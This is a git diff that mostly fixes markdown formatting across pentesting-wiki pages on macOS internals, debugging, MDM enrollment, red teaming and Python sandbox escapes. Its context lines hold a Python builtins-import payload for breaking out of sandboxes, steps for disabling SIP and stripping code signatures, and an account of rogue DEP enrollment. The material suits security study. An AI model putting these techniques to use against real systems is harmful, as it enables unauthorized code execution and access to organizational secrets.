-Mach was originated as a UNIX-compatible** operating system **back in 1984. One of its primary design **goals** was to be a **microkernel**; that is, to **minimize** the amount of code running in the **kernel** and allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level** Mach tasks.
+Mach was originated as a UNIX-compatible **operating system** back in 1984. One of its primary design **goals** was to be a **microkernel**; that is, to **minimize** the amount of code running in the **kernel** and allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level** Mach tasks.
 
 **In XNU, Mach is responsible for many of the low-level operations** you expect from a kernel, such as processor scheduling and multitasking and virtual- memory management.
 
@@ -29,7 +29,7 @@ To get an idea of just how complicated the interaction between these two sets of
 
 ### I/O Kit - Drivers
 
-I/O Kit is the open-source, object-oriented, **device-driver framework **in the XNU kernel and is responsible for the addition and management of **dynamically loaded device drivers**. These drivers allow for modular code to be added to the kernel dynamically for use with different hardware, for example. They are located in:
+I/O Kit is the open-source, object-oriented, **device-driver framework** in the XNU kernel and is responsible for the addition and management of **dynamically loaded device drivers**. These drivers allow for modular code to be added to the kernel dynamically for use with different hardware, for example. They are located in:
 
 * `/System/Library/Extensions`
   * KEXT files built into the OS X operating system.
@@ -78,7 +78,7 @@ On the **other** hand, many familiar pieces of Mac OS X are **not open source**.
 
 ### **Universal binaries**
 
-Mac OS binaries usually are compiled as universal binaries.** **A **universal binary** can **support multiple architectures in the same file**.
+Mac OS binaries usually are compiled as universal binaries. **** A **universal binary** can **support multiple architectures in the same file**.
 
 ```bash
 file /bin/ls
@@ -138,14 +138,14 @@ struct load_command {
 ```
 
 A **common** type of load command is **LC\_SEGMENT/LC\_SEGMENT\_64**, which **describes** a **segment:** \
-_A segment defines a **range of bytes **in a Mach-O file and the **addresses** and **memory** **protection** **attributes** at which those bytes are **mapped into **virtual memory when the dynamic linker loads the application._
+_A segment defines a **range of bytes** in a Mach-O file and the **addresses** and **memory**  **protection**  **attributes** at which those bytes are **mapped into** virtual memory when the dynamic linker loads the application._
 
 ![](<../../.gitbook/assets/image (557).png>)
 
 Common segments:
 
-* **`__TEXT`**: Contains **executable** **code** and **data** that is **read-only. **Common sections of this segment:
-  * `__text`:** **Compiled binary code
+* **`__TEXT`**: Contains **executable** **code** and **data** that is **read-only.** Common sections of this segment:
+  * `__text`: **** Compiled binary code
   * `__const`: Constant data
   * `__cstring`: String constants
 * **`__DATA`**: Contains data that is **writable.**
@@ -154,8 +154,8 @@ Common segments:
   * `__objc_*` (\_\_objc\_classlist, \_\_objc\_protolist, etc): Information used by the Objective-C runtime&#x20;
 * **`__LINKEDIT`**: Contains information for the linker (dyld) such as, "symbol, string, and relocation table entries."
 * **`__OBJC`**: Contains information used by the Objective-C runtime. Though this information might also be found in the \_\_DATA segment, within various in \_\_objc\_\* sections.
-* **`LC_MAIN`**: Contains the entrypoint in the **entryoff attribute. **At load time, **dyld** simply **adds** this value to the (in-memory) **base of the binary**, then **jumps** to this instruction to kickoff execution of the binary’s code.
-*   **`LC_LOAD_DYLIB`**:** **This load command describes a **dynamic** **library** dependency which **instructs** the **loader** (dyld) to l**oad and link said library**. There is a LC\_LOAD\_DYLIB load command **for each library **that the Mach-O binary requires.
+* **`LC_MAIN`**: Contains the entrypoint in the **entryoff attribute.** At load time, **dyld** simply **adds** this value to the (in-memory) **base of the binary**, then **jumps** to this instruction to kickoff execution of the binary’s code.
+*   **`LC_LOAD_DYLIB`**: **** This load command describes a **dynamic** **library** dependency which **instructs** the **loader** (dyld) to l**oad and link said library**. There is a LC\_LOAD\_DYLIB load command **for each library** that the Mach-O binary requires.
 
     * This load command is a structure of type **`dylib_command`** (which contains a struct dylib, describing the actual dependent dynamic library):
 
@@ -261,12 +261,12 @@ Note that this names can be obfuscated to make the reversing of the binary more
 
 There are some projects that allow to generate a binary executable by MacOS containing script code which will be executed. Some examples are:
 
-* **Platypus**: Generate MacOS binary executing** **shell scripts, Python, Perl, Ruby, PHP, Swift, Expect, Tcl, AWK, JavaScript, AppleScript or any other user-specified interpreter.
+* **Platypus**: Generate MacOS binary executing **** shell scripts, Python, Perl, Ruby, PHP, Swift, Expect, Tcl, AWK, JavaScript, AppleScript or any other user-specified interpreter.
   * **It saves the script in `Contents/Resources/script`. So finding this script is a good indicator that Platypus was used.**
-* **PyInstaller: **Python
-  * Ways to detect this is the use of the embedded** **string** “Py\_SetPythonHome” **or a a **call** into a function named **`pyi_main`.**
-* **Electron: **JavaScript, HTML, and CSS.
-  * These binaries will use **Electron Framework.framework**. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in `.asar` files. These binaries will use Electron Framework.framework. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in **`.asar` files**. It's possible **unpack** such archives via the **asar** node module, or the **npx** **utility: **`npx asar extract StrongBox.app/Contents/Resources/app.asar appUnpacked`\
+* **PyInstaller:** Python
+  * Ways to detect this is the use of the embedded **** string **“Py\_SetPythonHome”** or a a **call** into a function named **`pyi_main`.**
+* **Electron:** JavaScript, HTML, and CSS.
+  * These binaries will use **Electron Framework.framework**. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in `.asar` files. These binaries will use Electron Framework.framework. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in **`.asar` files**. It's possible **unpack** such archives via the **asar** node module, or the **npx** **utility:** `npx asar extract StrongBox.app/Contents/Resources/app.asar appUnpacked`\
 
 
 ## References
diff --git a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
index 304b7a36..41703e6d 100644
--- a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
+++ b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
@@ -32,14 +32,14 @@ When a function is called in a binary that uses objective-C, the compiled code i
 
 The params this function expects are:
 
-* The first parameter (**self**) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object (as a whole), whereas for an instance method, self  will point to an instantiated instance of the class as an object. 
-* The second parameter, (**op**), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.** 
-* The remaining parameters are any** values that are required by the method** (op).
+* The first parameter (**self**) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object (as a whole), whereas for an instance method, self  will point to an instantiated instance of the class as an object.&#x20;
+* The second parameter, (**op**), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.**&#x20;
+* The remaining parameters are any **values that are required by the method** (op).
 
-| **Argument  **    | **Register**                                                    | **(for) objc_msgSend**                                 |
+| **Argument**      | **Register**                                                    | **(for) objc\_msgSend**                                |
 | ----------------- | --------------------------------------------------------------- | ------------------------------------------------------ |
-| **1st argument ** | **rdi**                                                         | **self: object that the method is being invoked upon** |
-| **2nd argument ** | **rsi**                                                         | **op: name of the method**                             |
+| **1st argument**  | **rdi**                                                         | **self: object that the method is being invoked upon** |
+| **2nd argument**  | **rsi**                                                         | **op: name of the method**                             |
 | **3rd argument**  | **rdx**                                                         | **1st argument to the method**                         |
 | **4th argument**  | **rcx**                                                         | **2nd argument to the method**                         |
 | **5th argument**  | **r8**                                                          | **3rd argument to the method**                         |
@@ -50,12 +50,12 @@ The params this function expects are:
 
 * Check for high entropy
 * Check the strings (is there is almost no understandable string, packed)
-* The UPX packer for MacOS generates a section called "\__XHDR"
+* The UPX packer for MacOS generates a section called "\_\_XHDR"
 
 ## Dynamic Analysis
 
 {% hint style="warning" %}
-Note that in order to debug binaries, **SIP needs to be disabled **(`csrutil disable` or `csrutil enable --without debug`) or to copy the binaries to a temporary folder and **remove the signature **with `codesign --remove-signature <binary-path> `or allow the debugging of the binary (you can use [this script](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b))
+Note that in order to debug binaries, **SIP needs to be disabled** (`csrutil disable` or `csrutil enable --without debug`) or to copy the binaries to a temporary folder and **remove the signature** with `codesign --remove-signature <binary-path>` or allow the debugging of the binary (you can use [this script](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b))
 {% endhint %}
 
 {% hint style="warning" %}
@@ -79,7 +79,7 @@ ktrace trace -s -S -t c -c ls | grep "ls("
 
 ### dtrace
 
-It allows users access to applications at an extremely **low level **and provides a way for users to **trace** **programs** and even change their execution flow. Dtrace uses **probes** which are **placed throughout the kernel** and are at locations such as the beginning and end of system calls.
+It allows users access to applications at an extremely **low level** and provides a way for users to **trace** **programs** and even change their execution flow. Dtrace uses **probes** which are **placed throughout the kernel** and are at locations such as the beginning and end of system calls.
 
 The available probes of dtrace can be obtained with:
 
@@ -154,7 +154,7 @@ sudo dtrace -s syscalls_info.d -c "cat /etc/hosts"
 
 ****[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events.
 
-### fs_usage
+### fs\_usage
 
 Allows to follow actions performed by processes:
 
@@ -170,7 +170,7 @@ It also checks the binary processes against **virustotal** and show information
 
 ### lldb
 
-**lldb** is the de **facto tool **for **macOS** binary **debugging**.
+**lldb** is the de **facto tool** for **macOS** binary **debugging**.
 
 ```bash
 lldb ./malware.bin
@@ -193,11 +193,11 @@ lldb -n malware.bin --waitfor
 | **x/s \<reg/memory address>** | Display the memory as a null-terminated string.                                                                                                                                                                                                                                                                                                                                                                                       |
 | **x/i \<reg/memory address>** | Display the memory as assembly instruction.                                                                                                                                                                                                                                                                                                                                                                                           |
 | **x/b \<reg/memory address>** | Display the memory as byte.                                                                                                                                                                                                                                                                                                                                                                                                           |
-| **print object (po)**         | <p>This will print the object referenced by the param</p><p>po $raw</p><p><code>{</code></p><p><code> dnsChanger =  {</code></p><p><code>   "affiliate" = "";</code></p><p><code>   "blacklist_dns" = ();</code></p><p>Note that most of Apple’s Objective-C APIs or methods return objects, and thus should be displayed via the “print object” (po) command. If po doesn't produce a meaningful output use <code>x/b</code><br></p> |
+| **print object (po)**         | <p>This will print the object referenced by the param</p><p>po $raw</p><p><code>{</code></p><p> <code>dnsChanger =  {</code></p><p>   <code>"affiliate" = "";</code></p><p>   <code>"blacklist_dns" = ();</code></p><p>Note that most of Apple’s Objective-C APIs or methods return objects, and thus should be displayed via the “print object” (po) command. If po doesn't produce a meaningful output use <code>x/b</code><br></p> |
 | **memory write**              | memory write 0x100600000 -s 4 0x41414141 #Write AAAA in that address                                                                                                                                                                                                                                                                                                                                                                  |
 
 {% hint style="info" %}
-When calling the **`objc_sendMsg`** function, the **rsi** register holds the **name of the method **as a null-terminated (“C”) string. To print the name via lldb do:
+When calling the **`objc_sendMsg`** function, the **rsi** register holds the **name of the method** as a null-terminated (“C”) string. To print the name via lldb do:
 
 `(lldb) x/s $rsi: 0x1000f1576: "startMiningWithPort:password:coreCount:slowMemory:currency:"`
 
@@ -217,16 +217,16 @@ When calling the **`objc_sendMsg`** function, the **rsi** register holds the **n
 * It's also possible to find **if a process is being debugged** with a simple code such us:
   * `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //process being debugged }`
 * It can also invoke the **`ptrace`** system call with the **`PT_DENY_ATTACH`** flag. This **prevents** a deb**u**gger from attaching and tracing.
-  * You can check if the **`sysctl` **or**`ptrace`** function is being **imported** (but the malware could import it dynamically)
+  * You can check if the **`sysctl` ** or**`ptrace`** function is being **imported** (but the malware could import it dynamically)
   * As noted in this writeup, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\
-    “_The message Process # exited with **status = 45 (0x0000002d)** is usually a tell-tale sign that the debug target is using **PT_DENY_ATTACH**_”
+    “_The message Process # exited with **status = 45 (0x0000002d)** is usually a tell-tale sign that the debug target is using **PT\_DENY\_ATTACH**_”
 
 ## Fuzzing
 
 ### [ReportCrash](https://ss64.com/osx/reportcrash.html#:\~:text=ReportCrash%20analyzes%20crashing%20processes%20and%20saves%20a%20crash%20report%20to%20disk.\&text=ReportCrash%20also%20records%20the%20identity,when%20a%20crash%20is%20detected.)
 
 ReportCrash **analyzes crashing processes and saves a crash report to disk**. A crash report contains information that can **help a developer diagnose** the cause of a crash.\
-For applications and other processes** running in the per-user launchd context**, ReportCrash runs as a LaunchAgent and saves crash reports in the user's `~/Library/Logs/DiagnosticReports/`\
+For applications and other processes **running in the per-user launchd context**, ReportCrash runs as a LaunchAgent and saves crash reports in the user's `~/Library/Logs/DiagnosticReports/`\
 For daemons, other processes **running in the system launchd context** and other privileged processes, ReportCrash runs as a LaunchDaemon and saves crash reports in the system's `/Library/Logs/DiagnosticReports`
 
 If you are worried about crash reports **being sent to Apple** you can disable them. If not, crash reports can be useful to **figure out how a server crashed**.
@@ -251,7 +251,7 @@ While fuzzing in a MacOS it's important to not allow the Mac to sleep:
 
 #### SSH Disconnect
 
-If you are fuzzing via a SSH connection it's important to make sure the session isn't going to day. So change the sshd_config file with:
+If you are fuzzing via a SSH connection it's important to make sure the session isn't going to day. So change the sshd\_config file with:
 
 * TCPKeepAlive Yes
 * ClientAliveInterval 0
@@ -264,7 +264,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
 
 ### Internal Handlers
 
-[**Checkout this section**](./#file-extensions-apps)** **to find out how you can find which app is responsible of **handling the specified scheme or protocol**.
+[**Checkout this section**](./#file-extensions-apps) **** to find out how you can find which app is responsible of **handling the specified scheme or protocol**.
 
 ### Enumerating Network Processes
 
diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
index 602e12b8..dfcbc62c 100644
--- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
+++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
@@ -4,7 +4,7 @@
 
 ### What is MDM (Mobile Device Management)?
 
-[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) is a technology commonly used to **administer end-user computing devices** such as mobile phones, laptops, desktops and tablets. In the case of Apple platforms like iOS, macOS and tvOS, it refers to a specific set of features, APIs and techniques used by administrators to manage these devices. Management of devices via MDM requires a compatible commercial or open-source MDM server that implements support for the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf).
+[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile\_device\_management) (MDM) is a technology commonly used to **administer end-user computing devices** such as mobile phones, laptops, desktops and tablets. In the case of Apple platforms like iOS, macOS and tvOS, it refers to a specific set of features, APIs and techniques used by administrators to manage these devices. Management of devices via MDM requires a compatible commercial or open-source MDM server that implements support for the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf).
 
 * A way to achieve **centralized device management**
 * Requires an **MDM server** which implements support for the MDM protocol
@@ -12,7 +12,7 @@
 
 ### Basics What is DEP (Device Enrolment Program)?
 
-The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) is a service offered by Apple that **simplifies** Mobile Device Management (MDM) **enrollment** by offering **zero-touch configuration** of iOS, macOS, and tvOS devices. Unlike more traditional deployment methods, which require the end-user or administrator to take action to configure a device, or manually enroll with an MDM server, DEP aims to bootstrap this process, **allowing the user to unbox a new Apple device and have it configured for use in the organization almost immediately**.
+The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP\_Guide.pdf) (DEP) is a service offered by Apple that **simplifies** Mobile Device Management (MDM) **enrollment** by offering **zero-touch configuration** of iOS, macOS, and tvOS devices. Unlike more traditional deployment methods, which require the end-user or administrator to take action to configure a device, or manually enroll with an MDM server, DEP aims to bootstrap this process, **allowing the user to unbox a new Apple device and have it configured for use in the organization almost immediately**.
 
 Administrators can leverage DEP to automatically enroll devices in their organization’s MDM server. Once a device is enrolled, **in many cases it is treated as a “trusted”** device owned by the organization, and could receive any number of certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).
 
@@ -21,7 +21,7 @@ Administrators can leverage DEP to automatically enroll devices in their organiz
 * Can also be useful for **reprovisioning** workflows (**wiped** with fresh install of the OS)
 
 {% hint style="danger" %}
-Unfortunately, if an organization has not taken additional steps to** protect their MDM enrollment**, a simplified end-user enrollment process through DEP can also mean a simplified process for** attackers to enroll a device of their choosing in the organization’s MDM** server, assuming the "identity" of a corporate device.
+Unfortunately, if an organization has not taken additional steps to **protect their MDM enrollment**, a simplified end-user enrollment process through DEP can also mean a simplified process for **attackers to enroll a device of their choosing in the organization’s MDM** server, assuming the "identity" of a corporate device.
 {% endhint %}
 
 ### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
@@ -106,7 +106,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi
 5. Make the request
    1. POST to [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) sending the data `{ "action": "RequestProfileConfiguration", "sn": "" }`
    2. The JSON payload is encrypted using Absinthe (**`NACSign`**)
-   3. All requests over HTTPs, built-in root certificates are used 
+   3. All requests over HTTPs, built-in root certificates are used&#x20;
 
 ![](<../../../.gitbook/assets/image (566) (1).png>)
 
@@ -121,7 +121,7 @@ The response is a JSON dictionary with some important data like:
 
 * Request sent to **url provided in DEP profile**.
 * **Anchor certificates** are used to **evaluate trust** if provided.
-  * Reminder: the **anchor_certs** property of the DEP profile
+  * Reminder: the **anchor\_certs** property of the DEP profile
 * **Request is a simple .plist** with device identification
   * Examples: **UDID, OS version**.
 * CMS-signed, DER-encoded
diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
index 67dcf050..288cf3a6 100644
--- a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
+++ b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
@@ -2,10 +2,10 @@
 
 ## Intro
 
-As** **[**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
+As **** [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
 Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected.
 
-**The following research is taken from **[**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe)****
+**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe)****
 
 ## Reversing the process
 
@@ -47,7 +47,7 @@ rsi = @selector(sendConfigurationInfoToRemote);
 rsi = @selector(sendFailureNoticeToRemote);
 ```
 
-Since the **Absinthe** scheme is what appears to be used to authenticate requests to the DEP service, **reverse engineering **this scheme would allow us to make our own authenticated requests to the DEP API. This proved to be **time consuming**, though, mostly because of the number of steps involved in authenticating requests. Rather than fully reversing how this scheme works, we opted to explore other methods of inserting arbitrary serial numbers as part of the _Activation Record_ request.
+Since the **Absinthe** scheme is what appears to be used to authenticate requests to the DEP service, **reverse engineering** this scheme would allow us to make our own authenticated requests to the DEP API. This proved to be **time consuming**, though, mostly because of the number of steps involved in authenticating requests. Rather than fully reversing how this scheme works, we opted to explore other methods of inserting arbitrary serial numbers as part of the _Activation Record_ request.
 
 ### MITMing DEP Requests
 
@@ -60,7 +60,7 @@ sn": "
 }
 ```
 
-Since the API at _iprofiles.apple.com_ uses [Transport Layer Security](https://en.wikipedia.org/wiki/Transport_Layer_Security) (TLS), we needed to enable SSL Proxying in Charles for that host to see the plain text contents of the SSL requests.
+Since the API at _iprofiles.apple.com_ uses [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) (TLS), we needed to enable SSL Proxying in Charles for that host to see the plain text contents of the SSL requests.
 
 However, the `-[MCTeslaConfigurationFetcher connection:willSendRequestForAuthenticationChallenge:]` method checks the validity of the server certificate, and will abort if server trust cannot be verified.
 
@@ -82,7 +82,7 @@ ManagedClient.app/Contents/Resources/English.lproj/Errors.strings
 <snip>
 ```
 
-The _Errors.strings_ file can be [printed in a human-readable format](https://duo.com/labs/research/mdm-me-maybe#error_strings_output) with the built-in `plutil` command.
+The _Errors.strings_ file can be [printed in a human-readable format](https://duo.com/labs/research/mdm-me-maybe#error\_strings\_output) with the built-in `plutil` command.
 
 ```
 $ plutil -p /System/Library/CoreServices/ManagedClient.app/Contents/Resources/English.lproj/Errors.strings
@@ -118,7 +118,7 @@ One of the benefits of this method over modifying the binaries and re-signing th
 
 **System Integrity Protection**
 
-In order to instrument system binaries, (such as `cloudconfigurationd`) on macOS, [System Integrity Protection](https://support.apple.com/en-us/HT204899) (SIP) must be disabled. SIP is a security technology that protects system-level files, folders, and processes from tampering, and is enabled by default on OS X 10.11 “El Capitan” and later. [SIP can be disabled](https://developer.apple.com/library/archive/documentation/Security/Conceptual/System_Integrity_Protection_Guide/ConfiguringSystemIntegrityProtection/ConfiguringSystemIntegrityProtection.html) by booting into Recovery Mode and running the following command in the Terminal application, then rebooting:
+In order to instrument system binaries, (such as `cloudconfigurationd`) on macOS, [System Integrity Protection](https://support.apple.com/en-us/HT204899) (SIP) must be disabled. SIP is a security technology that protects system-level files, folders, and processes from tampering, and is enabled by default on OS X 10.11 “El Capitan” and later. [SIP can be disabled](https://developer.apple.com/library/archive/documentation/Security/Conceptual/System\_Integrity\_Protection\_Guide/ConfiguringSystemIntegrityProtection/ConfiguringSystemIntegrityProtection.html) by booting into Recovery Mode and running the following command in the Terminal application, then rebooting:
 
 ```
 csrutil enable --without debug
@@ -415,7 +415,7 @@ Although some of this information might be publicly available for certain organi
 
 #### Rogue DEP Enrollment
 
-The [Apple MDM protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) supports - but does not require - user authentication prior to MDM enrollment via [HTTP Basic Authentication](https://en.wikipedia.org/wiki/Basic_access_authentication). **Without authentication, all that's required to enroll a device in an MDM server via DEP is a valid, DEP-registered serial number**. Thus, an attacker that obtains such a serial number, (either through [OSINT](https://en.wikipedia.org/wiki/Open-source_intelligence), social engineering, or by brute-force), will be able to enroll a device of their own as if it were owned by the organization, as long as it's not currently enrolled in the MDM server. Essentially, if an attacker is able to win the race by initiating the DEP enrollment before the real device, they're able to assume the identity of that device.
+The [Apple MDM protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) supports - but does not require - user authentication prior to MDM enrollment via [HTTP Basic Authentication](https://en.wikipedia.org/wiki/Basic\_access\_authentication). **Without authentication, all that's required to enroll a device in an MDM server via DEP is a valid, DEP-registered serial number**. Thus, an attacker that obtains such a serial number, (either through [OSINT](https://en.wikipedia.org/wiki/Open-source\_intelligence), social engineering, or by brute-force), will be able to enroll a device of their own as if it were owned by the organization, as long as it's not currently enrolled in the MDM server. Essentially, if an attacker is able to win the race by initiating the DEP enrollment before the real device, they're able to assume the identity of that device.
 
 Organizations can - and do - leverage MDM to deploy sensitive information such as device and user certificates, VPN configuration data, enrollment agents, Configuration Profiles, and various other internal data and organizational secrets. Additionally, some organizations elect not to require user authentication as part of MDM enrollment. This has various benefits, such as a better user experience, and not having to [expose the internal authentication server to the MDM server to handle MDM enrollments that take place outside of the corporate network](https://docs.simplemdm.com/article/93-ldap-authentication-with-apple-dep).
 
diff --git a/macos/macos-security-and-privilege-escalation/macos-protocols.md b/macos/macos-security-and-privilege-escalation/macos-protocols.md
index 384995d6..1be12bdb 100644
--- a/macos/macos-security-and-privilege-escalation/macos-protocols.md
+++ b/macos/macos-security-and-privilege-escalation/macos-protocols.md
@@ -2,7 +2,7 @@
 
 ## Bonjour
 
-**Bonjour** is an Apple-designed technology that enables computers and **devices located on the same network to learn about services offered **by other computers and devices. It is designed such that any Bonjour-aware device can be plugged into a TCP/IP network and it will **pick an IP address** and make other computers on that network** aware of the services it offers**. Bonjour is sometimes referred to as Rendezvous, **Zero Configuration**, or Zeroconf.\
+**Bonjour** is an Apple-designed technology that enables computers and **devices located on the same network to learn about services offered** by other computers and devices. It is designed such that any Bonjour-aware device can be plugged into a TCP/IP network and it will **pick an IP address** and make other computers on that network **aware of the services it offers**. Bonjour is sometimes referred to as Rendezvous, **Zero Configuration**, or Zeroconf.\
 Zero Configuration Networking, such as Bonjour provides:
 
 * Must be able to **obtain an IP Address** (even without a DHCP server)
@@ -12,7 +12,7 @@ Zero Configuration Networking, such as Bonjour provides:
 The device will get an **IP address in the range 169.254/16** and will check if any other device is using that IP address. If not, it will keep the IP address. Macs keeps an entry in their routing table for this subnet: `netstat -rn | grep 169`
 
 For DNS the **Multicast DNS (mDNS) protocol is used**. [**mDNS** **services** listen in port **5353/UDP**](../../pentesting/5353-udp-multicast-dns-mdns.md), use **regular DNS queries** and use the **multicast address 224.0.0.251** instead of sending the request just to an IP address. Any machine listening these request will respond, usually to a multicast address, so all the devices can update their tables.\
-Each device will **select its own name** when accessing the network, the device will choose a name **ended in .local** (might be based on the hostname or a completely random one). 
+Each device will **select its own name** when accessing the network, the device will choose a name **ended in .local** (might be based on the hostname or a completely random one).&#x20;
 
 For **discovering services DNS Service Discovery (DNS-SD)** is used.
 
@@ -77,5 +77,5 @@ sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.p
 
 ## References
 
-* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt_other?\_encoding=UTF8\&me=\&qid=)****
+* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)****
 * ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)****
diff --git a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md
index 3a48b1cd..8e3dd3f0 100644
--- a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md
+++ b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md
@@ -5,7 +5,7 @@
 * JAMF Pro: `jamf checkJSSConnection`
 * Kandji
 
-If you manage to** compromise admin credentials** to access the management platform, you can **potentially compromise all the computers** by distributing your malware in the machines.
+If you manage to **compromise admin credentials** to access the management platform, you can **potentially compromise all the computers** by distributing your malware in the machines.
 
 For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work:
 
@@ -35,7 +35,7 @@ In some occasions you will find that the **MacOS computer is connected to an AD*
 [pentesting-kerberos-88](../../pentesting/pentesting-kerberos-88/)
 {% endcontent-ref %}
 
-Some **local MacOS tool **that may also help you is `dscl`:
+Some **local MacOS tool** that may also help you is `dscl`:
 
 ```bash
 dscl "/Active Directory/[Domain]/All Domains" ls /
diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/misc/basic-python/bypass-python-sandboxes/README.md
index f8cf6990..4f54c147 100644
--- a/misc/basic-python/bypass-python-sandboxes/README.md
+++ b/misc/basic-python/bypass-python-sandboxes/README.md
@@ -45,7 +45,7 @@ Remember that the _**open**_ and _**read**_ functions can be useful to **read fi
 **Python2 input()** function allows to execute python code before the program crashes.
 {% endhint %}
 
-Python try to **load libraries from the current directory first **(the following command will print where is python loading modules from): `python3 -c 'import sys; print(sys.path)'`
+Python try to **load libraries from the current directory first** (the following command will print where is python loading modules from): `python3 -c 'import sys; print(sys.path)'`
 
 ![](<../../../.gitbook/assets/image (552).png>)
 
@@ -54,7 +54,7 @@ Python try to **load libraries from the current directory first **(the following
 ### Default packages
 
 You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
-Note that from a pickle you can make the python env** import arbitrary libraries** installed in the system.\
+Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\
 For example the following pickle, when loaded, is going to import the pip library to use it:
 
 ```python
@@ -131,7 +131,7 @@ __builtins__.__dict__['__import__']("os").system("ls")
 ### No Builtins
 
 When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\
-However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous **functionalities inside of them that can be accessed to gain even **arbitrary code execution**.
+However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**.
 
 In the following examples you can observe how to **abuse** some of this "**benign**" modules loaded to **access** **dangerous** **functionalities** inside of them.
 
@@ -175,7 +175,7 @@ get_flag.__globals__['__builtins__']
 [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]
 ```
 
-[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds **of **places **were you can find the **builtins**.
+[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
 
 #### Python2 and Python3
 
